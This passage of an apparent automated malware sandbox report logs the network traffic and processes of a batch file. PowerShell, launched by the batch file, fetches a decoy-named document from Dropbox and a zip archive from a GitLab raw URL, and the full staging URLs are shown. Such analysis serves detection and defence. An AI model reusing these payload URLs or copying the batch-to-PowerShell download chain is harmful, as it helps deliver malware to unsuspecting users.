                                                                                                                                                                                        Nov 18, 2024 09:56:10.758029938 CET5768353192.168.2.61.1.1.1
                                                                                                                                                                                        Nov 18, 2024 09:56:10.874871969 CET53576831.1.1.1192.168.2.6

                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                        Nov 18, 2024 09:56:03.765657902 CET192.168.2.61.1.1.10x57e5Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 18, 2024 09:56:05.729635000 CET192.168.2.61.1.1.10x2089Standard query (0)ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 18, 2024 09:56:10.758029938 CET192.168.2.61.1.1.10xab8aStandard query (0)gitlab.comA (IP address)IN (0x0001)false

                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                        Nov 18, 2024 09:56:03.773993969 CET1.1.1.1192.168.2.60x57e5No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 18, 2024 09:56:03.773993969 CET1.1.1.1192.168.2.60x57e5No error (0)www-env.dropbox-dns.com162.125.66.18A (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 18, 2024 09:56:05.749852896 CET1.1.1.1192.168.2.60x2089No error (0)ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 18, 2024 09:56:05.749852896 CET1.1.1.1192.168.2.60x2089No error (0)edge-block-www-env.dropbox-dns.com162.125.66.15A (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 18, 2024 09:56:10.874871969 CET1.1.1.1192.168.2.60xab8aNo error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false

                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                        • www.dropbox.com
                                                                                                                                                                                        • gitlab.com

                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.649710162.125.66.184435896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-18 08:56:04 UTC189OUTGET /scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1 HTTP/1.1
                                                                                                                                                                                        Host: www.dropbox.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        2024-11-18 08:56:05 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                        Content-Security-Policy: media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; img-src https://* data: blob: ; base-uri 'self' ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_succes [TRUNCATED]
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Location: https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com/cd/0/get/CelT5aTdmoNoeQaou8KCBWvfzViGUKEb8nSbHLeokdyXVSSsdAjqEK6ii0Dp3z_qzP08r6FfH3AIJvFsL2UNpAEz3opEN74PommI1DRhRl1s8qf4Strwp8b9X_Tn5JVpiwdDQPLME9BKXbqVGrUbeF4L/file?dl=1#
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                        Set-Cookie: gvc=MzEyMDQ3NzM4NTk0MjcyNDgzMTU4NjE4Mzc0MTIzNzA3NTE4MzI=; Path=/; Expires=Sat, 17 Nov 2029 08:56:04 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                        Set-Cookie: t=tdNgJ1jXf9EuYyP8Rovm1w8I; Path=/; Domain=dropbox.com; Expires=Tue, 18 Nov 2025 08:56:04 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                        Set-Cookie: __Host-js_csrf=tdNgJ1jXf9EuYyP8Rovm1w8I; Path=/; Expires=Tue, 18 Nov 2025 08:56:04 GMT; Secure; SameSite=None
                                                                                                                                                                                        Set-Cookie: __Host-ss=BvoXwfZM7c; Path=/; Expires=Tue, 18 Nov 2025 08:56:04 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                        Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sat, 17 Nov 2029 08:56:04 GMT
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                        Content-Length: 17
                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:56:05 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                        X-Dropbox-Request-Id: 204c838655b94d15afcff026704d091d
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-11-18 08:56:05 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                        Data Ascii: ...status=302-->


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        1192.168.2.649722172.65.251.784431584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-18 08:56:11 UTC95OUTGET /bosse21/mkt/-/raw/main/12Fukrun.zip HTTP/1.1
                                                                                                                                                                                        Host: gitlab.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        2024-11-18 08:56:11 UTC169INHTTP/1.1 302 Found
                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:56:11 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        cache-control: no-cache
                                                                                                                                                                                        2024-11-18 08:56:11 UTC2340INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                        Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                        2024-11-18 08:56:11 UTC571INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 73 53 5a 77 4d 6f 67 79 43 42 36 25 32 42 69 6b 65 37 5a 6e 32 4e 65 35 70 69 61 4f 70 66 75 55 6c 6e 47 52 65 30 66 68 39 6b 69 61 55 47 68 73 69 62 35 45 77 5a 57 56 4d 68 56 77 68 41 6f 79 4f 46 53 35 61 35 74 59 4d 56 74 6a 38 5a 35 36 50 50 35 74 47 50 4f 76 35 36 43 54 43 42 45 64 61 44 41 46 49 51 4f 33 6a 31 71 30 35 65 39 50 61 35 75 77 5a 4c 77 73 32 78 34 68 6b 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75
                                                                                                                                                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sSZwMogyCB6%2Bike7Zn2Ne5piaOpfuUlnGRe0fh9kiaUGhsib5EwZWVMhVwhAoyOFS5a5tYMVtj8Z56PP5tGPOv56CTCBEdaDAFIQO3j1q05e9Pa5uwZLws2x4hk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"su
                                                                                                                                                                                        2024-11-18 08:56:11 UTC104INData Raw: 36 32 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 75 73 65 72 73 2f 73 69 67 6e 5f 69 6e 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                        Data Ascii: 62<html><body>You are being <a href="https://gitlab.com/users/sign_in">redirected</a>.</body></html>
                                                                                                                                                                                        2024-11-18 08:56:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        2192.168.2.649729172.65.251.784431584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-18 08:56:12 UTC49OUTGET /users/sign_in HTTP/1.1
                                                                                                                                                                                        Host: gitlab.com
                                                                                                                                                                                        2024-11-18 08:56:12 UTC1279INHTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:56:12 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Content-Length: 8200
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                        Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                        Origin-Agent-Cluster: ?1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                        X-Content-Options: nosniff
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-mitigated: challenge
                                                                                                                                                                                        2024-11-18 08:56:12 UTC780INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 45 33 54 52 44 48 6c 76 2b 39 57 4c 64 4e 56 38 47 4d 31 72 49 45 45 78 58 71 65 47 49 4a 74 54 2b 4d 6b 2f 48 59 53 4c 69 6e 68 44 35 62 59 74 5a 73 30 72 52 4f 72 74 35 75 51 61 6d 66 6b 6e 41 39 33 31 61 35 70 70 4d 65 34 7a 39 59 6c 41 4e 54 2b 74 34 54 33 55 53 47 4a 36 7a 70 6b 32 47 6d 34 62 4f 45 59 4f 70 63 65 68 35 6f 79 32 76 6f 2f 66 36 71 54 68 46 78 79 49 64 5a 65 68 47 67 46 68 66 67 47 71 57 46 46 4e 31 49 50 2f 67 38 4a 38 4c 67 3d 3d 24 46 48 32 30 32 6c 66 67 4e 69 59 38 50 50 47 62 6a 6e 77 45 44 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                                                                                                                                                                        Data Ascii: cf-chl-out: E3TRDHlv+9WLdNV8GM1rIEExXqeGIJtT+Mk/HYSLinhD5bYtZs0rROrt5uQamfknA931a5ppMe4z9YlANT+t4T3USGJ6zpk2Gm4bOEYOpceh5oy2vo/f6qThFxyIdZehGgFhfgGqWFFN1IP/g8J8Lg==$FH202lfgNiY8PPGbjnwEDA==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                                                                                                                                                                        2024-11-18 08:56:12 UTC679INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                                                                                                                                                        2024-11-18 08:56:12 UTC1369INData Raw: 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 7d 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 7d 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65
                                                                                                                                                                                        Data Ascii: tent{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-te
                                                                                                                                                                                        2024-11-18 08:56:12 UTC1369INData Raw: 6e 61 67 65 64 27 2c 63 52 61 79 3a 20 27 38 65 34 36 62 65 66 35 38 65 31 63 34 37 37 36 27 2c 63 48 3a 20 27 75 46 79 6e 79 4e 6a 74 36 39 4d 32 7a 52 55 4e 77 61 68 5f 70 43 75 65 33 45 6f 45 47 6d 70 38 5a 45 32 32 71 57 51 33 72 32 49 2d 31 37 33 31 39 32 30 31 37 32 2d 31 2e 32 2e 31 2e 31 2d 49 6a 67 57 56 67 30 30 50 58 6e 72 64 72 6c 47 57 52 64 4e 72 38 41 78 76 45 73 4f 6b 6e 74 38 74 4e 49 52 74 6c 59 30 4d 33 78 76 70 71 49 49 7a 55 5a 6d 4b 2e 50 4f 36 52 38 6a 33 32 61 68 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 75 73 65 72 73 5c 2f 73 69 67 6e 5f 69 6e 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 51 48 46 61 52 4c 61 5a 59 74 38 56 64 63 66 6d 4f 35 69 49 6d 52 6b 33 4e 76 5a 43 4c 37 6c 39 73 51 53 6c 45 70 4b 57 47 64 4d 2d 31 37 33 31 39 32
                                                                                                                                                                                        Data Ascii: naged',cRay: '8e46bef58e1c4776',cH: 'uFynyNjt69M2zRUNwah_pCue3EoEGmp8ZE22qWQ3r2I-1731920172-1.2.1.1-IjgWVg00PXnrdrlGWRdNr8AxvEsOknt8tNIRtlY0M3xvpqIIzUZmK.PO6R8j32ah',cUPMDTk: "\/users\/sign_in?__cf_chl_tk=QHFaRLaZYt8VdcfmO5iImRk3NvZCL7l9sQSlEpKWGdM-173192
                                                                                                                                                                                        2024-11-18 08:56:12 UTC1369INData Raw: 71 78 49 39 6a 72 77 44 4f 46 78 71 58 62 4a 75 4c 6d 48 58 4c 41 45 63 4a 6b 4d 61 57 49 37 62 72 6f 71 61 6a 42 44 4f 63 43 4c 6e 30 68 55 31 6a 39 69 47 48 38 39 63 72 58 59 35 49 35 32 72 32 6c 4d 31 6d 52 65 48 61 61 56 34 4a 68 74 55 55 69 6e 34 77 6f 62 33 5f 50 4c 55 4f 71 4c 6a 32 45 45 70 4f 49 75 63 57 4d 51 76 61 45 71 38 7a 76 34 4f 30 43 7a 66 79 32 57 39 61 54 53 5f 59 6b 72 42 77 7a 41 30 39 74 49 33 6a 76 5a 47 31 45 50 34 68 56 31 35 6d 76 70 73 51 6a 2e 73 67 39 4b 65 59 76 4c 70 74 64 7a 68 74 7a 5f 35 48 31 5f 53 58 49 2e 58 6b 4a 76 55 4c 45 72 37 67 68 50 30 51 4c 41 6c 46 54 69 2e 6a 45 4f 71 72 6e 4a 72 79 77 42 66 71 6c 55 69 69 46 79 41 30 42 51 64 6c 52 48 67 37 39 36 44 71 6c 70 6c 50 4a 47 43 61 4e 66 35 56 78 69 46 57 42 38
                                                                                                                                                                                        Data Ascii: qxI9jrwDOFxqXbJuLmHXLAEcJkMaWI7broqajBDOcCLn0hU1j9iGH89crXY5I52r2lM1mReHaaV4JhtUUin4wob3_PLUOqLj2EEpOIucWMQvaEq8zv4O0Czfy2W9aTS_YkrBwzA09tI3jvZG1EP4hV15mvpsQj.sg9KeYvLptdzhtz_5H1_SXI.XkJvULEr7ghP0QLAlFTi.jEOqrnJrywBfqlUiiFyA0BQdlRHg796DqlplPJGCaNf5VxiFWB8
                                                                                                                                                                                        2024-11-18 08:56:12 UTC1369INData Raw: 68 76 51 4f 6b 2e 6a 50 63 4d 34 71 69 6d 36 33 69 39 4a 71 48 38 33 4e 4a 64 79 61 4b 31 55 32 2e 58 65 30 69 79 31 67 47 76 79 57 61 34 52 70 5f 64 6c 71 73 52 49 67 52 78 4d 31 51 46 48 4e 4b 34 66 30 54 6f 58 53 56 58 6c 30 74 61 4d 7a 55 53 55 6f 4b 36 69 43 48 76 4f 31 56 7a 76 47 39 49 39 42 36 4d 42 4c 72 35 4e 79 55 50 65 66 4e 75 4e 6d 6a 35 7a 33 57 37 2e 73 59 58 30 73 46 76 38 4d 48 48 35 47 31 4b 68 65 52 43 57 38 6d 33 4d 78 70 66 2e 70 4e 77 67 22 2c 6d 64 72 64 3a 20 22 51 34 32 63 38 63 68 48 4b 7a 74 2e 41 66 57 54 71 75 47 6d 6b 44 54 4b 42 68 6f 71 4d 4b 6d 4a 2e 31 54 38 71 76 6e 4d 4d 78 77 2d 31 37 33 31 39 32 30 31 37 32 2d 31 2e 32 2e 31 2e 31 2d 52 72 78 6b 66 6b 36 71 65 70 54 49 33 57 69 42 48 74 6e 4d 57 6a 5a 4c 4b 39 38 33
                                                                                                                                                                                        Data Ascii: hvQOk.jPcM4qim63i9JqH83NJdyaK1U2.Xe0iy1gGvyWa4Rp_dlqsRIgRxM1QFHNK4f0ToXSVXl0taMzUSUoK6iCHvO1VzvG9I9B6MBLr5NyUPefNuNmj5z3W7.sYX0sFv8MHH5G1KheRCW8m3Mxpf.pNwg",mdrd: "Q42c8chHKzt.AfWTquGmkDTKBhoqMKmJ.1T8qvnMMxw-1731920172-1.2.1.1-Rrxkfk6qepTI3WiBHtnMWjZLK983
                                                                                                                                                                                        2024-11-18 08:56:12 UTC1369INData Raw: 36 43 4b 51 35 32 4d 4c 34 42 62 42 32 68 67 43 4b 37 4e 65 44 43 42 58 73 74 63 70 4b 62 79 51 53 37 52 6e 4a 32 78 33 52 42 30 37 79 2e 6a 63 39 45 7a 74 4e 76 70 57 36 69 59 4a 6b 53 53 32 31 30 62 44 78 59 74 64 52 58 55 5f 52 53 45 4e 35 59 41 38 51 6a 66 6c 76 56 31 48 72 37 59 61 62 38 50 4c 42 74 48 46 4b 4f 66 4e 4f 76 49 66 6f 56 65 51 30 36 67 44 36 2e 48 73 6b 63 43 56 44 55 6a 6b 62 53 55 54 5f 78 5f 73 42 78 57 4d 59 5f 76 53 65 4c 34 5f 44 41 57 38 51 33 50 78 56 7a 51 6f 46 70 58 6a 74 67 30 4a 5f 44 47 72 46 78 33 55 61 57 64 50 70 54 61 4e 4e 77 45 78 75 46 6a 70 4c 31 79 37 51 4c 52 35 78 63 5f 48 30 6c 31 61 42 41 76 36 64 6c 46 58 57 52 5a 46 44 72 4a 4e 52 4f 4e 73 57 72 4b 36 4c 5f 52 6d 73 57 42 37 39 39 41 33 67 36 46 74 79 36 4b
                                                                                                                                                                                        Data Ascii: 6CKQ52ML4BbB2hgCK7NeDCBXstcpKbyQS7RnJ2x3RB07y.jc9EztNvpW6iYJkSS210bDxYtdRXU_RSEN5YA8QjflvV1Hr7Yab8PLBtHFKOfNOvIfoVeQ06gD6.HskcCVDUjkbSUT_x_sBxWMY_vSeL4_DAW8Q3PxVzQoFpXjtg0J_DGrFx3UaWdPpTaNNwExuFjpL1y7QLR5xc_H0l1aBAv6dlFXWRZFDrJNRONsWrK6L_RmsWB799A3g6Fty6K
                                                                                                                                                                                        2024-11-18 08:56:12 UTC676INData Raw: 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 20 3d 3d 3d 20 27 27 20 26 26 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 6c 69 63 65 28 30 2c 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 6c 65 6e 67 74 68 20 2d 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 2e 6c 65 6e 67 74 68 29 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 3f 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 69 66 20 28 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 20 26 26 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 29 20 7b 76 61 72 20 6f 67 55 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e
                                                                                                                                                                                        Data Ascii: ow._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathn


                                                                                                                                                                                        Statistics

                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Behavior

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        System Behavior

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" "
                                                                                                                                                                                        Imagebase:0x7ff69e8d0000
                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:chcp.com 437
                                                                                                                                                                                        Imagebase:0x7ff7bea50000
                                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):false
